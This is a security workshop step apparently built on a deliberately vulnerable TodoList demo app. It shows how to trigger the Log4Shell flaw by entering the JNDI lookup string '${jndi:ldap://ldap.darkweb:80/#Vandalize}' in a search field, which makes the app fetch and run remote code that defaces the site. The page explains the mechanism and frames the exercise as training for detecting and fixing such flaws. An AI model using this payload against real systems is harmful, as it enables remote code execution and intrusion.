+++ title = "Step 7: Exploit a Vulnerable Open Source component" chapter = false weight = 42 +++ ## Exploiting an RCE vulnerability in the TodoList application. The `Goof` repo TodoList application includes various exploits to demonstrate the risks of open source vulnerabilities. We'll demonstrate the infamous Log4Shell vulnerability as an example of an extremenly profific open source package with a critical CVE that was relatively easy to exploit and gives malicous actors a remote code execution (RCE) vector of attack. ### Open the website This example is best exploited from your browser so open a tab and navigate to the `todolist` application's loadbalancer address with `/todolist` appended to it. That hostname was stored in the `TODOLIST_LB` variable during a prior section so you can easily get a string for the URL by echoing it out like this: ```sh echo $TODOLIST_LB/todolist ``` ```sh a4b2da77928d242b38e4229083fc2669-2133201151.us-east-2.elb.amazonaws.com/todolist ``` When you open that URL in your browser, you should see the ToDoList welcome page ![todolist-welcome-page](/images/todolist-welcome.png) ### Log into the app Click "Sign in" and log into the form with the following pre-populated user account: * User: foo@bar.org * Password: foobar ![todolist-login](/images/todolist-login.png) ### Trigger the exploit In the search field enter the following string `${jndi:ldap://ldap.darkweb:80/#Vandalize}` and submit the search. ![todolist-search](/images/todolist-search-jndi.png) ### Vandalized! Immediately, you can see that the header for the entire site has been modified to show a the hacker equivelent of graphiti! ![todolist-vandalized](/images/todolist-vandalized.png) ## What? Why? A full rundown of the Log4Shell issue is out of scope for this workshop but the high level description is: * This application is pulling in an older version of the log4j open source library * The log4j code (at that version) blindly interpolates the JNDI addresses and queries the network for remote values * Search queries are being logged by the application using log4j * When the interpolated `${jndi:ldap://ldap.darkweb:80/#Vandalize}` string was encountered, log4j queried an LDAP server named `ldap.darkweb` to ask for something named "/#Vandalize" * 'ldap.darkweb' is a malicous LDAP impersonator that recognized this request and interacted with log4j code in a way that caused malicuous Java bytecode to be returned and run in the JVM by log4j * That bytecode modified the header.jsp file in this webapp The returned bytecode could have done far more mallicous things, not the least of which would be to open a remote, reverse shell into the container. ## Catching and stoping this In the next step we will look into ways to catch and fix vulnerabilities like this.